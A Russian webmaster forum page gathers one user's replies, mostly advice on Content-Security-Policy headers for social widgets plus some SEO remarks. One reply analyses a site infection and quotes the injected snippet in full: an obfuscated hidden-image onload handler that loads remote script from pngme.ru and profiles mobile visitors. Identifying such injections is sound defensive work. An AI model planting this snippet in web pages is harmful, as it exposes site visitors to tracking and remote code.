Ladycharm

Рейтинг
351
Регистрация
07.12.2007
J-ran:
Не перекроет. Перекрывал бы, ведущие СМИ федерального уровня с посещаемостью за 100К не торговали бы ссылками на свой страх и риск.

Просто у вас никогда не было коммерческого трафика. С 500 посетителей на контексте в лучшие времена получалось 30-40 тыс руб в месяц.

tippula:
С помощью CSP можно ли как то блокировать работу adblock?

Адблок (и все другие плагины) работают на внутренней вкладке (странице) браузера, на неё ваша CSP не действует, так же как она не действует и на остальные вкладки браузера. CSP может заблокировать только то, что на вашей странице, но туда Адблок ничего не вставляет.

Для Адблока действует его собственная CSP, которая прописана в его манифесте (для Хрома).

А вот вредоносные плагины подмены рекламы вынуждены вставлять её на ваши страницы, поэтому их можно заблокировать.

PS: В старых версиях Хрома - Адблок можно было заблокировать и без CSP. Но, увы, Хром обновляется автоматически.

Kaavain:
Если директива default-src определяет политику по умолчанию для всего, для чего она не задана в явном виде, то можно ли использовать ТОЛЬКО эту директиву

Можно. Только надо иметь ввиду, что некоторые пока мало используемые директивы типа: plugin-types, form-action и sandbox не инициируются из default-src.

Kaavain:
И то не уверен про пэйпал и юнителлер - это агрегаторы карточных платежей, на них просто переход и все их скрипты только у них и работают...

Да, они не нужны, но можете их и оставить, эти домены вряд ли будут распространять заразу.

Tvix007:
Подскажите, что это за гадость?

Домен PNGME.RU created: 2015.09.06, свеженький -> однозначно гадость. Появляется не только у вас, и в разных видах:

<img src='//vk.com/images/upload.gif' style='display:none' onload="xy=document.createElement('scr'+'ipt');xy.src='//pngme.ru/seter?_';document.body.appendChild(xy);">

Скрипт реагирует только на некоторые мобильные устройства и в параметрах собирает следующие данные:

pngme.ru/seter?r=
&ref_js=http%3A%2F%2Foneline.tv%2Fspletnica-7-sezon-smotret-online.html
&s=1176*885
&wo=false
&title=Сплетница%207%20сезон%20смотреть%20онлайн%20в%20хорошем%20качестве%20бесплатно

и садит куки Cookie: jynytofupyriny и redomyfa

Судя по всему скрипт будет сливать ваших мобильных посетителей.

webmaster domainer, если отдавать несколько заголовков Content-Security-Policy - броузер их не суммирует и отрабатывает только последний из них. То есть, в вашем случае, будет работать только заголовок Header set Content-Security-Policy "style-src 'self' 'unsafe-inline' *.twitter.com https://*.twitter.com;"

Надо делать всё в одном Header set Content-Security-Policy "..."

webmaster domainer:
вопрос: как настроить CSP для твиттера, чтобы не блокировал ссыль виджета социальных кнопок

CSP для виджетов и кнопок Твитетра:

frame-src 'self' *.twitter.com https://*.twitter.com;
img-src 'self' *.twimg.com https://*.twimg.com *.twitter.com https://*.twitter.com;
script-src 'self' 'unsafe-inline' *.twimg.com https://*.twimg.com *.twitter.com https://*.twitter.com;
style-src 'self' 'unsafe-inline' *.twitter.com https://*.twitter.com;
Gwendi:
получила вот такую ситуацию в консоли: скрин в аттаче

По поводу ошибок:

- домен connect.facebook.net надо добавить в connect-src (у вас используются виджеты фэйсбука 2-х типов, и, тот, который HTML5 - использует connect)

- алерт(про default-src) можно проигнорировать, это просто предупреждение о бессмысленности использования Content-Security-Policy-Report-Only при неуказанном report-uri - "они" не понимают, что блокировки можно посмотреть в консоли браузера :)

Если добавить report-uri - этого алерта не будет, после перевода CSP в боевой режим (Content-Security-Policy) - его не будет тоже.

Gwendi:
И как лучше: вставлять код в header, или в .htaccess?

Правильнее всего заголовки выдавать движком сайта на PHP. Можно проверять UserAgent и:

- не отдавать CSP "проблемным" браузерам

- давать другую CSP для мобильных устройств

- давать другой заголовок («X-WebKit-CSP» или «X-Content-Security-Policy»)

Удобно вносить исправления и можно проводить различные эксперименты.

В .htaccess очень неудобно вносить правки и любая ошибка в .htaccess -> ошибка сервера 502.

htaccess-а не бывает на серверах под nginx, плюс, некоторые хостеры не позволяют рулить заголовками через htaccess.

Поэтому, для WordPressa - перспективнее вставлять в header.php, но, иметь ввиду, что при смене темы он перезапишется на новый.

PS: Gwendi, прочитайте личку!

Wariag:
у меня почти тысяча запросов от ВЧ до имеющих единичный спрос

Тысяча запросов на 18 страницах сайта? Ну-Ну...

Wariag:
Но при этом позиции ни у одной нет даже по самому нулевому запросу

Во-первых, у вас запросы: "окна", "двери", "лестницы", "мебель".

Во-вторых, проверьте в вебмастере присвоен ли сайту регион Тула

В-третьих, отзывы на сайте - фейковые(см картинку ниже), и такие уже есть на других сайтах (например на ОкнахКомфорта).

jpg review.jpg
NeMaster:
Разницу между закупкой через агрегаторы в сапе и линками со статей по мадридскому фен шуй в ГГЛ улавливаете ???

Для Яндекса разницы нет, он отавливает весь этот фен-шуй от Гогетлинкс. Но в ГГЛ потом очень дорого снимать ссылки и очень муторно, поэтому для оптимизатора, да - разница есть.

SmileP:
Ранее не передавался. Может в этой вариции что-то поменялось) Отсюда и вопрос.

Приклеивание своего домена на чужой требует действий только от вас, вторая сторона никак не может помешать этому, и даже не узнает. Поэтому ПС не могут передавать санкции по редиректу, по крайней мере, когда контент на обеих доменах абсолютно разный.

Всего: 4257